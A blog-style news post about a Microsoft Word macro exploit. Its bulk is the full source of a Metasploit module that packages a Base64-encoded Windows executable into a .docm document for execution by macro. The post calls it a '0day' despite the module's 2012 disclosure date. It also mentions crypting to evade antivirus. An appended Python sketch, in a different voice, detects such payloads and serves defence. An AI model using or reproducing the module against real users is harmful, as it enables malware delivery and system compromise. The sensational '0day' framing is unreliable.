The Hack Post

Microsoft Word Macro Execution 0day Exploit Found

by Alizaib Hassan
February 9, 2017

An exploit in Microsoft Office Word has been discovered that allows hackers to execute malicious macro-based code. Attackers can run the exploit in Metasploit and embed a macro virus into a Microsoft Word document.

According to Wikipedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel, Power point allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses, however they are still difficult to detect and its spread from the network.

A hacker injecting this exploit into a network of computers can be destructive. A virus such as this can spread like bacteria in a petri dish, especially in this day and age, when files are constantly transferred from one computer to another, not just in schools but also in workplaces and, of course, among friends and families. The virus can spread to millions of computers within just a few months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias sinn3r, with the whole code available for anyone to use. It is not yet known whether sinn3r is the original author of the exploit.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Macro Execution",
      'Description'    => %q{
        This module generates a macro-enabled Microsoft Office Word document. The comments
        metadata in the data is injected with a Base64 encoded payload, which will be
        decoded by the macro and execute as a Windows executable.

        For a successful attack, the victim is required to manually enable macro execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r' # Metasploit
        ],
      'References'     =>
        [
          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'DisablePayloadHandler' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Microsoft Office Word', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 10 2012",
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new("BODY", [false, 'The message for the document body', '']),
      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
    ], self.class)
  end

  # Substitutes the placeholders in the template files as they are read.
  def on_file_read(short_fname, full_fname)
    buf = File.read(full_fname)

    case short_fname
    when /document\.xml/
      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
    when /core\.xml/
      b64_payload = ' ' * 55
      b64_payload << Rex::Text.encode_base64(generate_payload_exe)
      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
    end

    # The original filename of __rels is actually ".rels".
    # But for some reason if that's our original filename, it won't be included
    # in the archive. So this hacks around that.
    case short_fname
    when /__rels/
      short_fname.gsub!(/\_\_rels/, '.rels')
    end

    yield short_fname, buf
  end

  # Zips the template directory into a .docm archive.
  def package_docm(path)
    zip = Rex::Zip::Archive.new

    Dir["#{path}/**/**"].each do |file|
      p = file.sub(path+'/','')

      if File.directory?(file)
        print_status("Packaging directory: #{file}")
        zip.add_file(p)
      else
        on_file_read(p, file) do |fname, buf|
          print_status("Packaging file: #{fname}")
          zip.add_file(fname, buf)
        end
      end
    end

    zip.pack
  end

  def exploit
    print_status('Generating our docm file...')
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
    docm = package_docm(path)
    file_create(docm)
    super
  end
end

Viruses embedded into other forms and formats of files can also easily go unnoticed by antivirus software. Silent viruses and macro viruses such as this one can easily be made undetectable by a method called crypting. Methods such as these have existed since the very first virus was created. With time, hackers have gotten smarter, and so have their destructive viruses and methods of evading detection.
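For defenders, the module's description points at a static check: a macro-enabled document whose comments metadata in docProps/core.xml holds a long Base64 run that decodes to an executable header. The Python sketch below is an added example, not code from the article or from Metasploit; the function names, the 200-character threshold and the sample archives are assumptions constructed for illustration.

```python
import base64
import io
import re
import zipfile

# A long Base64 run in metadata is unusual; the 200-char threshold is an assumption.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
CORE = "<cp:coreProperties><dc:description>{}</dc:description></cp:coreProperties>"

def scan_ooxml(data: bytes) -> dict:
    """Flag macro storage and Base64-encoded executables in docProps/core.xml."""
    found = {"has_macros": False, "b64_runs": 0, "embedded_pe": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Macro-enabled documents carry their VBA project in vbaProject.bin.
        found["has_macros"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        if "docProps/core.xml" not in names:
            return found
        core = z.read("docProps/core.xml").decode("utf-8", "replace")
        for run in B64_RUN.finditer(core):
            found["b64_runs"] += 1
            try:
                head = base64.b64decode(run.group(0)[:64])  # first 48 decoded bytes
            except ValueError:
                continue
            if head.startswith(b"MZ"):  # DOS/PE header magic
                found["embedded_pe"] = True
    return found

def build_sample(description: str, with_macro: bool) -> bytes:
    """Build a constructed, inert OOXML-like archive for testing the scanner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", CORE.format(description))
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00")  # placeholder, not real VBA
    return buf.getvalue()

# Constructed stand-in for an encoded executable: "MZ" followed by zero bytes.
FAKE_PE_B64 = base64.b64encode(b"MZ" + b"\x00" * 300).decode()
SUSPICIOUS = build_sample(" " * 55 + FAKE_PE_B64, with_macro=True)
BENIGN = build_sample("Quarterly report draft", with_macro=False)

if __name__ == "__main__":
    print("suspicious:", scan_ooxml(SUSPICIOUS))
    print("benign:    ", scan_ooxml(BENIGN))
```

A hit on both `has_macros` and `embedded_pe` is a strong signal for quarantine; a long Base64 run alone is worth a closer look, because the payload could be encoded or wrapped differently.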

Tags: Microsoft Word Exploit